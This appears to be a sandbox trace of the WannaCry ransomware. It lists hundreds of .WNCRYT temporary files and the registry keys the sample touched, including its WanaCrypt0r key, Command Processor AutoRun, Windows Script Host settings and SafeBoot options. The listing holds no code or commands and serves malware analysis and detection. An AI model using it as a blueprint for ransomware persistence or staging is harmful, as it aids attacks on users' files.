C:\Users\user\AppData\Local\Temp\15.WNCRYT
C:\Users\user\AppData\Local\Temp\150.WNCRYT
C:\Users\user\AppData\Local\Temp\151.WNCRYT
C:\Users\user\AppData\Local\Temp\152.WNCRYT
C:\Users\user\AppData\Local\Temp\153.WNCRYT
C:\Users\user\AppData\Local\Temp\154.WNCRYT
C:\Users\user\AppData\Local\Temp\155.WNCRYT
C:\Users\user\AppData\Local\Temp\156.WNCRYT
C:\Users\user\AppData\Local\Temp\157.WNCRYT
C:\Users\user\AppData\Local\Temp\158.WNCRYT
C:\Users\user\AppData\Local\Temp\159.WNCRYT
C:\Users\user\AppData\Local\Temp\16.WNCRYT
C:\Users\user\AppData\Local\Temp\160.WNCRYT
C:\Users\user\AppData\Local\Temp\161.WNCRYT
C:\Users\user\AppData\Local\Temp\162.WNCRYT
C:\Users\user\AppData\Local\Temp\163.WNCRYT
C:\Users\user\AppData\Local\Temp\164.WNCRYT
C:\Users\user\AppData\Local\Temp\165.WNCRYT
C:\Users\user\AppData\Local\Temp\166.WNCRYT
C:\Users\user\AppData\Local\Temp\167.WNCRYT
C:\Users\user\AppData\Local\Temp\168.WNCRYT
C:\Users\user\AppData\Local\Temp\169.WNCRYT
C:\Users\user\AppData\Local\Temp\17.WNCRYT
C:\Users\user\AppData\Local\Temp\170.WNCRYT
C:\Users\user\AppData\Local\Temp\171.WNCRYT
C:\Users\user\AppData\Local\Temp\172.WNCRYT
C:\Users\user\AppData\Local\Temp\173.WNCRYT
C:\Users\user\AppData\Local\Temp\174.WNCRYT
C:\Users\user\AppData\Local\Temp\175.WNCRYT
C:\Users\user\AppData\Local\Temp\176.WNCRYT
C:\Users\user\AppData\Local\Temp\177.WNCRYT
C:\Users\user\AppData\Local\Temp\178.WNCRYT
C:\Users\user\AppData\Local\Temp\179.WNCRYT
C:\Users\user\AppData\Local\Temp\18.WNCRYT
C:\Users\user\AppData\Local\Temp\180.WNCRYT
C:\Users\user\AppData\Local\Temp\181.WNCRYT
C:\Users\user\AppData\Local\Temp\182.WNCRYT
C:\Users\user\AppData\Local\Temp\183.WNCRYT
C:\Users\user\AppData\Local\Temp\184.WNCRYT
C:\Users\user\AppData\Local\Temp\185.WNCRYT
C:\Users\user\AppData\Local\Temp\186.WNCRYT
C:\Users\user\AppData\Local\Temp\187.WNCRYT
C:\Users\user\AppData\Local\Temp\188.WNCRYT
C:\Users\user\AppData\Local\Temp\189.WNCRYT
C:\Users\user\AppData\Local\Temp\19.WNCRYT
C:\Users\user\AppData\Local\Temp\190.WNCRYT
C:\Users\user\AppData\Local\Temp\191.WNCRYT
C:\Users\user\AppData\Local\Temp\192.WNCRYT
C:\Users\user\AppData\Local\Temp\193.WNCRYT
C:\Users\user\AppData\Local\Temp\194.WNCRYT
C:\Users\user\AppData\Local\Temp\195.WNCRYT
C:\Users\user\AppData\Local\Temp\196.WNCRYT
C:\Users\user\AppData\Local\Temp\197.WNCRYT
C:\Users\user\AppData\Local\Temp\198.WNCRYT
C:\Users\user\AppData\Local\Temp\199.WNCRYT
C:\Users\user\AppData\Local\Temp\2.WNCRYT
C:\Users\user\AppData\Local\Temp\20.WNCRYT
C:\Users\user\AppData\Local\Temp\200.WNCRYT
C:\Users\user\AppData\Local\Temp\201.WNCRYT
C:\Users\user\AppData\Local\Temp\202.WNCRYT
C:\Users\user\AppData\Local\Temp\203.WNCRYT
C:\Users\user\AppData\Local\Temp\204.WNCRYT
C:\Users\user\AppData\Local\Temp\205.WNCRYT
C:\Users\user\AppData\Local\Temp\206.WNCRYT
C:\Users\user\AppData\Local\Temp\207.WNCRYT
C:\Users\user\AppData\Local\Temp\208.WNCRYT
C:\Users\user\AppData\Local\Temp\209.WNCRYT
C:\Users\user\AppData\Local\Temp\21.WNCRYT
C:\Users\user\AppData\Local\Temp\210.WNCRYT
C:\Users\user\AppData\Local\Temp\211.WNCRYT
C:\Users\user\AppData\Local\Temp\212.WNCRYT
C:\Users\user\AppData\Local\Temp\213.WNCRYT
C:\Users\user\AppData\Local\Temp\214.WNCRYT
C:\Users\user\AppData\Local\Temp\215.WNCRYT
C:\Users\user\AppData\Local\Temp\216.WNCRYT
C:\Users\user\AppData\Local\Temp\217.WNCRYT
C:\Users\user\AppData\Local\Temp\218.WNCRYT
C:\Users\user\AppData\Local\Temp\219.WNCRYT
C:\Users\user\AppData\Local\Temp\22.WNCRYT
C:\Users\user\AppData\Local\Temp\220.WNCRYT
C:\Users\user\AppData\Local\Temp\221.WNCRYT
C:\Users\user\AppData\Local\Temp\222.WNCRYT
C:\Users\user\AppData\Local\Temp\223.WNCRYT
C:\Users\user\AppData\Local\Temp\224.WNCRYT
C:\Users\user\AppData\Local\Temp\225.WNCRYT
C:\Users\user\AppData\Local\Temp\226.WNCRYT
C:\Users\user\AppData\Local\Temp\227.WNCRYT
C:\Users\user\AppData\Local\Temp\228.WNCRYT
C:\Users\user\AppData\Local\Temp\229.WNCRYT
C:\Users\user\AppData\Local\Temp\23.WNCRYT
C:\Users\user\AppData\Local\Temp\230.WNCRYT
C:\Users\user\AppData\Local\Temp\231.WNCRYT
C:\Users\user\AppData\Local\Temp\232.WNCRYT
C:\Users\user\AppData\Local\Temp\233.WNCRYT
C:\Users\user\AppData\Local\Temp\234.WNCRYT
C:\Users\user\AppData\Local\Temp\235.WNCRYT
C:\Users\user\AppData\Local\Temp\236.WNCRYT
C:\Users\user\AppData\Local\Temp\237.WNCRYT
C:\Users\user\AppData\Local\Temp\238.WNCRYT
C:\Users\user\AppData\Local\Temp\239.WNCRYT
C:\Users\user\AppData\Local\Temp\24.WNCRYT
C:\Users\user\AppData\Local\Temp\240.WNCRYT
C:\Users\user\AppData\Local\Temp\241.WNCRYT
C:\Users\user\AppData\Local\Temp\242.WNCRYT
C:\Users\user\AppData\Local\Temp\243.WNCRYT
C:\Users\user\AppData\Local\Temp\244.WNCRYT
C:\Users\user\AppData\Local\Temp\245.WNCRYT
C:\Users\user\AppData\Local\Temp\246.WNCRYT
C:\Users\user\AppData\Local\Temp\247.WNCRYT
C:\Users\user\AppData\Local\Temp\248.WNCRYT
C:\Users\user\AppData\Local\Temp\249.WNCRYT
C:\Users\user\AppData\Local\Temp\25.WNCRYT
C:\Users\user\AppData\Local\Temp\250.WNCRYT
C:\Users\user\AppData\Local\Temp\251.WNCRYT
C:\Users\user\AppData\Local\Temp\252.WNCRYT
C:\Users\user\AppData\Local\Temp\253.WNCRYT
C:\Users\user\AppData\Local\Temp\254.WNCRYT
C:\Users\user\AppData\Local\Temp\255.WNCRYT
C:\Users\user\AppData\Local\Temp\256.WNCRYT
C:\Users\user\AppData\Local\Temp\257.WNCRYT
C:\Users\user\AppData\Local\Temp\258.WNCRYT
C:\Users\user\AppData\Local\Temp\259.WNCRYT
C:\Users\user\AppData\Local\Temp\26.WNCRYT
C:\Users\user\AppData\Local\Temp\260.WNCRYT
C:\Users\user\AppData\Local\Temp\261.WNCRYT
C:\Users\user\AppData\Local\Temp\262.WNCRYT
C:\Users\user\AppData\Local\Temp\263.WNCRYT
C:\Users\user\AppData\Local\Temp\264.WNCRYT
C:\Users\user\AppData\Local\Temp\265.WNCRYT
C:\Users\user\AppData\Local\Temp\266.WNCRYT
C:\Users\user\AppData\Local\Temp\267.WNCRYT
C:\Users\user\AppData\Local\Temp\268.WNCRYT
C:\Users\user\AppData\Local\Temp\269.WNCRYT
C:\Users\user\AppData\Local\Temp\27.WNCRYT
C:\Users\user\AppData\Local\Temp\270.WNCRYT
C:\Users\user\AppData\Local\Temp\271.WNCRYT
C:\Users\user\AppData\Local\Temp\272.WNCRYT
C:\Users\user\AppData\Local\Temp\273.WNCRYT
C:\Users\user\AppData\Local\Temp\274.WNCRYT
C:\Users\user\AppData\Local\Temp\275.WNCRYT
C:\Users\user\AppData\Local\Temp\276.WNCRYT
C:\Users\user\AppData\Local\Temp\277.WNCRYT
C:\Users\user\AppData\Local\Temp\278.WNCRYT
C:\Users\user\AppData\Local\Temp\279.WNCRYT
C:\Users\user\AppData\Local\Temp\28.WNCRYT
C:\Users\user\AppData\Local\Temp\280.WNCRYT
C:\Users\user\AppData\Local\Temp\281.WNCRYT
C:\Users\user\AppData\Local\Temp\282.WNCRYT
C:\Users\user\AppData\Local\Temp\283.WNCRYT
C:\Users\user\AppData\Local\Temp\284.WNCRYT
C:\Users\user\AppData\Local\Temp\285.WNCRYT
C:\Users\user\AppData\Local\Temp\286.WNCRYT
C:\Users\user\AppData\Local\Temp\287.WNCRYT
C:\Users\user\AppData\Local\Temp\288.WNCRYT
C:\Users\user\AppData\Local\Temp\289.WNCRYT
C:\Users\user\AppData\Local\Temp\29.WNCRYT
C:\Users\user\AppData\Local\Temp\290.WNCRYT
C:\Users\user\AppData\Local\Temp\291.WNCRYT
C:\Users\user\AppData\Local\Temp\292.WNCRYT
C:\Users\user\AppData\Local\Temp\293.WNCRYT
C:\Users\user\AppData\Local\Temp\294.WNCRYT
C:\Users\user\AppData\Local\Temp\295.WNCRYT
C:\Users\user\AppData\Local\Temp\296.WNCRYT
C:\Users\user\AppData\Local\Temp\297.WNCRYT
C:\Users\user\AppData\Local\Temp\298.WNCRYT
C:\Users\user\AppData\Local\Temp\299.WNCRYT
C:\Users\user\AppData\Local\Temp\3.WNCRYT
C:\Users\user\AppData\Local\Temp\30.WNCRYT
C:\Users\user\AppData\Local\Temp\300.WNCRYT
C:\Users\user\AppData\Local\Temp\301.WNCRYT
C:\Users\user\AppData\Local\Temp\302.WNCRYT
C:\Users\user\AppData\Local\Temp\303.WNCRYT
C:\Users\user\AppData\Local\Temp\304.WNCRYT
C:\Users\user\AppData\Local\Temp\305.WNCRYT
C:\Users\user\AppData\Local\Temp\306.WNCRYT
C:\Users\user\AppData\Local\Temp\307.WNCRYT
C:\Users\user\AppData\Local\Temp\308.WNCRYT
C:\Users\user\AppData\Local\Temp\309.WNCRYT
C:\Users\user\AppData\Local\Temp\31.WNCRYT
C:\Users\user\AppData\Local\Temp\310.WNCRYT
C:\Users\user\AppData\Local\Temp\311.WNCRYT
C:\Users\user\AppData\Local\Temp\312.WNCRYT
C:\Users\user\AppData\Local\Temp\313.WNCRYT
C:\Users\user\AppData\Local\Temp\314.WNCRYT
C:\Users\user\AppData\Local\Temp\315.WNCRYT
C:\Users\user\AppData\Local\Temp\316.WNCRYT
C:\Users\user\AppData\Local\Temp\317.WNCRYT
C:\Users\user\AppData\Local\Temp\318.WNCRYT
C:\Users\user\AppData\Local\Temp\319.WNCRYT
C:\Users\user\AppData\Local\Temp\32.WNCRYT
C:\Users\user\AppData\Local\Temp\320.WNCRYT
C:\Users\user\AppData\Local\Temp\321.WNCRYT
C:\Users\user\AppData\Local\Temp\322.WNCRYT
C:\Users\user\AppData\Local\Temp\323.WNCRYT
C:\Users\user\AppData\Local\Temp\324.WNCRYT
C:\Users\user\AppData\Local\Temp\325.WNCRYT
C:\Users\user\AppData\Local\Temp\326.WNCRYT
C:\Users\user\AppData\Local\Temp\327.WNCRYT
C:\Users\user\AppData\Local\Temp\328.WNCRYT
C:\Users\user\AppData\Local\Temp\329.WNCRYT
C:\Users\user\AppData\Local\Temp\33.WNCRYT
C:\Users\user\AppData\Local\Temp\330.WNCRYT
C:\Users\user\AppData\Local\Temp\331.WNCRYT
C:\Users\user\AppData\Local\Temp\332.WNCRYT
C:\Users\user\AppData\Local\Temp\333.WNCRYT
C:\Users\user\AppData\Local\Temp\334.WNCRYT
C:\Users\user\AppData\Local\Temp\335.WNCRYT
C:\Users\user\AppData\Local\Temp\336.WNCRYT
C:\Users\user\AppData\Local\Temp\337.WNCRYT
C:\Users\user\AppData\Local\Temp\338.WNCRYT
C:\Users\user\AppData\Local\Temp\339.WNCRYT
C:\Users\user\AppData\Local\Temp\34.WNCRYT
C:\Users\user\AppData\Local\Temp\340.WNCRYT
C:\Users\user\AppData\Local\Temp\341.WNCRYT
C:\Users\user\AppData\Local\Temp\342.WNCRYT
C:\Users\user\AppData\Local\Temp\343.WNCRYT
C:\Users\user\AppData\Local\Temp\344.WNCRYT
C:\Users\user\AppData\Local\Temp\345.WNCRYT
C:\Users\user\AppData\Local\Temp\346.WNCRYT
C:\Users\user\AppData\Local\Temp\347.WNCRYT
C:\Users\user\AppData\Local\Temp\348.WNCRYT
C:\Users\user\AppData\Local\Temp\349.WNCRYT
C:\Users\user\AppData\Local\Temp\35.WNCRYT
C:\Users\user\AppData\Local\Temp\350.WNCRYT
C:\Users\user\AppData\Local\Temp\351.WNCRYT
C:\Users\user\AppData\Local\Temp\352.WNCRYT
C:\Users\user\AppData\Local\Temp\353.WNCRYT
C:\Users\user\AppData\Local\Temp\36.WNCRYT
C:\Users\user\AppData\Local\Temp\360.WNCRYT
C:\Users\user\AppData\Local\Temp\361.WNCRYT
C:\Users\user\AppData\Local\Temp\37.WNCRYT
C:\Users\user\AppData\Local\Temp\38.WNCRYT
C:\Users\user\AppData\Local\Temp\39.WNCRYT
C:\Users\user\AppData\Local\Temp\397.WNCRYT
C:\Users\user\AppData\Local\Temp\398.WNCRYT
C:\Users\user\AppData\Local\Temp\399.WNCRYT
C:\Users\user\AppData\Local\Temp\4.WNCRYT
C:\Users\user\AppData\Local\Temp\40.WNCRYT
C:\Users\user\AppData\Local\Temp\400.WNCRYT
C:\Users\user\AppData\Local\Temp\401.WNCRYT
C:\Users\user\AppData\Local\Temp\402.WNCRYT
C:\Users\user\AppData\Local\Temp\403.WNCRYT
C:\Users\user\AppData\Local\Temp\404.WNCRYT
C:\Users\user\AppData\Local\Temp\405.WNCRYT
C:\Users\user\AppData\Local\Temp\406.WNCRYT
C:\Users\user\AppData\Local\Temp\407.WNCRYT
C:\Users\user\AppData\Local\Temp\408.WNCRYT
C:\Users\user\AppData\Local\Temp\409.WNCRYT
C:\Users\user\AppData\Local\Temp\41.WNCRYT
C:\Users\user\AppData\Local\Temp\410.WNCRYT
C:\Users\user\AppData\Local\Temp\411.WNCRYT
C:\Users\user\AppData\Local\Temp\412.WNCRYT
C:\Users\user\AppData\Local\Temp\413.WNCRYT
C:\Users\user\AppData\Local\Temp\414.WNCRYT
C:\Users\user\AppData\Local\Temp\415.WNCRYT
C:\Users\user\AppData\Local\Temp\416.WNCRYT
C:\Users\user\AppData\Local\Temp\417.WNCRYT
C:\Users\user\AppData\Local\Temp\418.WNCRYT
C:\Users\user\AppData\Local\Temp\419.WNCRYT
C:\Users\user\AppData\Local\Temp\42.WNCRYT
C:\Users\user\AppData\Local\Temp\420.WNCRYT
C:\Users\user\AppData\Local\Temp\422.WNCRYT
C:\Users\user\AppData\Local\Temp\423.WNCRYT
C:\Users\user\AppData\Local\Temp\424.WNCRYT
C:\Users\user\AppData\Local\Temp\425.WNCRYT
C:\Users\user\AppData\Local\Temp\426.WNCRYT
C:\Users\user\AppData\Local\Temp\427.WNCRYT
C:\Users\user\AppData\Local\Temp\428.WNCRYT
C:\Users\user\AppData\Local\Temp\429.WNCRYT
C:\Users\user\AppData\Local\Temp\43.WNCRYT
C:\Users\user\AppData\Local\Temp\430.WNCRYT
C:\Users\user\AppData\Local\Temp\431.WNCRYT
C:\Users\user\AppData\Local\Temp\432.WNCRYT
C:\Users\user\AppData\Local\Temp\433.WNCRYT
C:\Users\user\AppData\Local\Temp\434.WNCRYT
C:\Users\user\AppData\Local\Temp\435.WNCRYT
C:\Users\user\AppData\Local\Temp\436.WNCRYT
C:\Users\user\AppData\Local\Temp\437.WNCRYT
C:\Users\user\AppData\Local\Temp\438.WNCRYT
C:\Users\user\AppData\Local\Temp\439.WNCRYT
C:\Users\user\AppData\Local\Temp\44.WNCRYT
C:\Users\user\AppData\Local\Temp\440.WNCRYT
C:\Users\user\AppData\Local\Temp\441.WNCRYT
C:\Users\user\AppData\Local\Temp\442.WNCRYT
C:\Users\user\AppData\Local\Temp\443.WNCRYT
C:\Users\user\AppData\Local\Temp\444.WNCRYT
C:\Users\user\AppData\Local\Temp\445.WNCRYT
C:\Users\user\AppData\Local\Temp\446.WNCRYT
C:\Users\user\AppData\Local\Temp\447.WNCRYT
C:\Users\user\AppData\Local\Temp\448.WNCRYT
C:\Users\user\AppData\Local\Temp\449.WNCRYT
C:\Users\user\AppData\Local\Temp\45.WNCRYT
C:\Users\user\AppData\Local\Temp\450.WNCRYT
C:\Users\user\AppData\Local\Temp\451.WNCRYT
C:\Users\user\AppData\Local\Temp\452.WNCRYT
C:\Users\user\AppData\Local\Temp\453.WNCRYT
C:\Users\user\AppData\Local\Temp\454.WNCRYT
C:\Users\user\AppData\Local\Temp\455.WNCRYT
C:\Users\user\AppData\Local\Temp\456.WNCRYT
C:\Users\user\AppData\Local\Temp\457.WNCRYT
C:\Users\user\AppData\Local\Temp\458.WNCRYT
C:\Users\user\AppData\Local\Temp\459.WNCRYT
C:\Users\user\AppData\Local\Temp\46.WNCRYT
C:\Users\user\AppData\Local\Temp\460.WNCRYT
C:\Users\user\AppData\Local\Temp\461.WNCRYT
C:\Users\user\AppData\Local\Temp\462.WNCRYT
C:\Users\user\AppData\Local\Temp\463.WNCRYT
C:\Users\user\AppData\Local\Temp\464.WNCRYT
C:\Users\user\AppData\Local\Temp\465.WNCRYT
C:\Users\user\AppData\Local\Temp\466.WNCRYT
C:\Users\user\AppData\Local\Temp\467.WNCRYT
C:\Users\user\AppData\Local\Temp\468.WNCRYT
C:\Users\user\AppData\Local\Temp\469.WNCRYT
C:\Users\user\AppData\Local\Temp\47.WNCRYT
C:\Users\user\AppData\Local\Temp\470.WNCRYT
C:\Users\user\AppData\Local\Temp\471.WNCRYT
C:\Users\user\AppData\Local\Temp\472.WNCRYT
C:\Users\user\AppData\Local\Temp\473.WNCRYT
C:\Users\user\AppData\Local\Temp\474.WNCRYT
C:\Users\user\AppData\Local\Temp\475.WNCRYT
C:\Users\user\AppData\Local\Temp\476.WNCRYT
C:\Users\user\AppData\Local\Temp\477.WNCRYT
C:\Users\user\AppData\Local\Temp\478.WNCRYT
C:\Users\user\AppData\Local\Temp\479.WNCRYT
C:\Users\user\AppData\Local\Temp\48.WNCRYT
C:\Users\user\AppData\Local\Temp\480.WNCRYT
C:\Users\user\AppData\Local\Temp\481.WNCRYT
C:\Users\user\AppData\Local\Temp\482.WNCRYT
C:\Users\user\AppData\Local\Temp\483.WNCRYT
C:\Users\user\AppData\Local\Temp\484.WNCRYT
C:\Users\user\AppData\Local\Temp\485.WNCRYT
C:\Users\user\AppData\Local\Temp\486.WNCRYT
C:\Users\user\AppData\Local\Temp\487.WNCRYT
C:\Users\user\AppData\Local\Temp\488.WNCRYT
C:\Users\user\AppData\Local\Temp\489.WNCRYT
C:\Users\user\AppData\Local\Temp\49.WNCRYT
C:\Users\user\AppData\Local\Temp\490.WNCRYT
C:\Users\user\AppData\Local\Temp\491.WNCRYT
C:\Users\user\AppData\Local\Temp\492.WNCRYT
C:\Users\user\AppData\Local\Temp\493.WNCRYT
C:\Users\user\AppData\Local\Temp\494.WNCRYT
C:\Users\user\AppData\Local\Temp\495.WNCRYT
C:\Users\user\AppData\Local\Temp\496.WNCRYT
C:\Users\user\AppData\Local\Temp\497.WNCRYT
C:\Users\user\AppData\Local\Temp\498.WNCRYT
C:\Users\user\AppData\Local\Temp\499.WNCRYT
C:\Users\user\AppData\Local\Temp\5.WNCRYT
C:\Users\user\AppData\Local\Temp\50.WNCRYT
C:\Users\user\AppData\Local\Temp\500.WNCRYT
C:\Users\user\AppData\Local\Temp\501.WNCRYT
C:\Users\user\AppData\Local\Temp\502.WNCRYT
C:\Users\user\AppData\Local\Temp\503.WNCRYT
C:\Users\user\AppData\Local\Temp\504.WNCRYT
C:\Users\user\AppData\Local\Temp\505.WNCRYT
C:\Users\user\AppData\Local\Temp\506.WNCRYT
C:\Users\user\AppData\Local\Temp\507.WNCRYT
C:\Users\user\AppData\Local\Temp\508.WNCRYT
C:\Users\user\AppData\Local\Temp\509.WNCRYT
C:\Users\user\AppData\Local\Temp\51.WNCRYT
C:\Users\user\AppData\Local\Temp\510.WNCRYT
C:\Users\user\AppData\Local\Temp\511.WNCRYT
C:\Users\user\AppData\Local\Temp\512.WNCRYT
C:\Users\user\AppData\Local\Temp\513.WNCRYT
C:\Users\user\AppData\Local\Temp\514.WNCRYT
C:\Users\user\AppData\Local\Temp\515.WNCRYT
C:\Users\user\AppData\Local\Temp\516.WNCRYT
C:\Users\user\AppData\Local\Temp\517.WNCRYT
C:\Users\user\AppData\Local\Temp\518.WNCRYT
C:\Users\user\AppData\Local\Temp\519.WNCRYT
C:\Users\user\AppData\Local\Temp\52.WNCRYT
C:\Users\user\AppData\Local\Temp\520.WNCRYT
C:\Users\user\AppData\Local\Temp\521.WNCRYT
C:\Users\user\AppData\Local\Temp\522.WNCRYT
C:\Users\user\AppData\Local\Temp\523.WNCRYT
C:\Users\user\AppData\Local\Temp\524.WNCRYT
C:\Users\user\AppData\Local\Temp\525.WNCRYT
C:\Users\user\AppData\Local\Temp\526.WNCRYT
C:\Users\user\AppData\Local\Temp\527.WNCRYT
C:\Users\user\AppData\Local\Temp\528.WNCRYT
C:\Users\user\AppData\Local\Temp\529.WNCRYT
C:\Users\user\AppData\Local\Temp\53.WNCRYT
C:\Users\user\AppData\Local\Temp\530.WNCRYT
C:\Users\user\AppData\Local\Temp\531.WNCRYT
C:\Users\user\AppData\Local\Temp\532.WNCRYT
C:\Users\user\AppData\Local\Temp\533.WNCRYT
C:\Users\user\AppData\Local\Temp\534.WNCRYT
C:\Users\user\AppData\Local\Temp\535.WNCRYT
C:\Users\user\AppData\Local\Temp\536.WNCRYT
C:\Users\user\AppData\Local\Temp\537.WNCRYT
C:\Users\user\AppData\Local\Temp\538.WNCRYT
C:\Users\user\AppData\Local\Temp\539.WNCRYT
C:\Users\user\AppData\Local\Temp\540.WNCRYT
C:\Users\user\AppData\Local\Temp\541.WNCRYT
C:\Users\user\AppData\Local\Temp\542.WNCRYT
C:\Users\user\AppData\Local\Temp\543.WNCRYT
C:\Users\user\AppData\Local\Temp\55.WNCRYT
C:\Users\user\AppData\Local\Temp\56.WNCRYT
C:\Users\user\AppData\Local\Temp\57.WNCRYT
C:\Users\user\AppData\Local\Temp\58.WNCRYT
C:\Users\user\AppData\Local\Temp\59.WNCRYT
C:\Users\user\AppData\Local\Temp\6.WNCRYT
C:\Users\user\AppData\Local\Temp\60.WNCRYT
C:\Users\user\AppData\Local\Temp\61.WNCRYT
C:\Users\user\AppData\Local\Temp\62.WNCRYT
C:\Users\user\AppData\Local\Temp\63.WNCRYT
C:\Users\user\AppData\Local\Temp\64.WNCRYT
C:\Users\user\AppData\Local\Temp\65.WNCRYT
C:\Users\user\AppData\Local\Temp\66.WNCRYT
C:\Users\user\AppData\Local\Temp\67.WNCRYT
C:\Users\user\AppData\Local\Temp\68.WNCRYT
C:\Users\user\AppData\Local\Temp\69.WNCRYT
C:\Users\user\AppData\Local\Temp\7.WNCRYT
C:\Users\user\AppData\Local\Temp\70.WNCRYT
C:\Users\user\AppData\Local\Temp\71.WNCRYT
C:\Users\user\AppData\Local\Temp\72.WNCRYT
C:\Users\user\AppData\Local\Temp\73.WNCRYT
C:\Users\user\AppData\Local\Temp\74.WNCRYT
C:\Users\user\AppData\Local\Temp\75.WNCRYT
C:\Users\user\AppData\Local\Temp\76.WNCRYT
C:\Users\user\AppData\Local\Temp\77.WNCRYT
C:\Users\user\AppData\Local\Temp\78.WNCRYT
C:\Users\user\AppData\Local\Temp\79.WNCRYT
C:\Users\user\AppData\Local\Temp\8.WNCRYT
C:\Users\user\AppData\Local\Temp\80.WNCRYT
C:\Users\user\AppData\Local\Temp\81.WNCRYT
C:\Users\user\AppData\Local\Temp\82.WNCRYT
C:\Users\user\AppData\Local\Temp\83.WNCRYT
C:\Users\user\AppData\Local\Temp\84.WNCRYT
C:\Users\user\AppData\Local\Temp\85.WNCRYT
C:\Users\user\AppData\Local\Temp\86.WNCRYT
C:\Users\user\AppData\Local\Temp\87.WNCRYT
C:\Users\user\AppData\Local\Temp\88.WNCRYT
C:\Users\user\AppData\Local\Temp\89.WNCRYT
C:\Users\user\AppData\Local\Temp\9.WNCRYT
C:\Users\user\AppData\Local\Temp\90.WNCRYT
C:\Users\user\AppData\Local\Temp\91.WNCRYT
C:\Users\user\AppData\Local\Temp\92.WNCRYT
C:\Users\user\AppData\Local\Temp\93.WNCRYT
C:\Users\user\AppData\Local\Temp\94.WNCRYT
C:\Users\user\AppData\Local\Temp\95.WNCRYT
C:\Users\user\AppData\Local\Temp\96.WNCRYT
C:\Users\user\AppData\Local\Temp\97.WNCRYT
C:\Users\user\AppData\Local\Temp\98.WNCRYT
C:\Users\user\AppData\Local\Temp\99.WNCRYT
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\WanaCrypt0r
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\WanaCrypt0r\wd
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\IgnoreUserSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\Enabled
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\cscript.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\Timeout
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CLASSES_ROOT\.vbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vbs\(Default)
HKEY_CLASSES_ROOT\VBSFile\ScriptEngine
